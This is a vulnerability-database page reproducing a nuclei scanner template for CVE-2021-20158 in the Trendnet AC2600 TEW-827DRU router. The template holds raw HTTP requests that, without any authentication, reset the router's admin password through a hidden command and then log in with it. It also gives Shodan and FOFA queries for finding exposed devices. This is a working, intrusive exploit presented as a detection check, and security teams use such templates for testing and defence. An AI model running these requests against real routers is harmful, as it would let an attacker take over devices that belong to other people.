Lucene search
K

Trendnet AC2600 TEW-827DRU 2.08B01 - Admin Password Change

🗓️ 05 Jul 2026 03:01:21Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 37 Views

Trendnet AC2600 TEW-827DRU 2.08B01 authentication bypass fi

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2021-20150
27 Apr 202309:58
circl
Circl
CVE-2021-20158
31 Dec 202100:34
circl
CNNVD
Trendnet AC2600 访问控制错误漏洞
30 Dec 202100:00
cnnvd
CNNVD
Trendnet AC2600 访问控制错误漏洞
30 Dec 202100:00
cnnvd
CNVD
Trendnet AC2600 TEW-827DRU Authentication Bypass Vulnerability
3 Jan 202200:00
cnvd
CNVD
Trendnet AC2600 TEW-827DRU Licensing Issue Vulnerability
3 Jan 202200:00
cnvd
CVE
CVE-2021-20150
30 Dec 202121:31
cve
CVE
CVE-2021-20158
30 Dec 202121:31
cve
Cvelist
CVE-2021-20150
30 Dec 202121:31
cvelist
Cvelist
CVE-2021-20158
30 Dec 202121:31
cvelist
Rows per page
id: CVE-2021-20158

info:
  name: Trendnet AC2600 TEW-827DRU 2.08B01 - Admin Password Change
  author: gy741
  severity: critical
  description: Trendnet AC2600 TEW-827DRU version 2.08B01 contains an authentication bypass vulnerability. It is possible for an unauthenticated, malicious actor to force change the admin password due to a hidden administrative command.
  impact: |
    An attacker with authenticated access can gain unauthorized control over the affected device.
  remediation: |
    Upgrade to the latest firmware version provided by Trendnet to fix the vulnerability.
  reference:
    - https://www.tenable.com/security/research/tra-2021-54
    - https://nvd.nist.gov/vuln/detail/CVE-2021-20150
    - https://github.com/ARPSyndicate/cvemon
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2021-20158
    cwe-id: CWE-306
    epss-score: 0.10774
    epss-percentile: 0.95297
    cpe: cpe:2.3:o:trendnet:tew-827dru_firmware:2.08b01:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: trendnet
    product: tew-827dru_firmware
    shodan-query:
      - http.html:"TEW-827DRU"
      - http.html:"tew-827dru"
    fofa-query: body="tew-827dru"
  tags: cve2021,cve,disclosure,router,intrusive,tenable,trendnet,vuln
variables:
  password: "{{rand_base(6)}}"

http:
  - raw:
      - |
        POST /apply_sec.cgi HTTP/1.1
        Host: {{Hostname}}

        ccp_act=set&action=tools_admin_elecom&html_response_page=dummy_value&html_response_return_page=dummy_value&method=tools&admin_password={{password}}
      - |
        POST /apply_sec.cgi HTTP/1.1
        Host: {{Hostname}}

        html_response_page=%2Flogin_pic.asp&login_name=YWRtaW4%3D&log_pass={{base64(password)}}&action=do_graph_auth&login_n=admin&tmp_log_pass=&graph_code=&session_id=

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'setConnectDevice'
          - 'setInternet'
          - 'setWlanSSID'
          - 'TEW-827DRU'
        condition: and

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200
# digest: 490a0046304402202b94bb8748606ddad08a190c4625690d33d1e80f1c6cd2c95710217b86f3bfd1022018effd8556f545a46bce9b6069b2becbb15f70c2168c748792ff5166ddb23199:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.8Medium risk
Vulners AI Score6.8
CVSS 27.5
CVSS 3.19.8
EPSS0.4006
37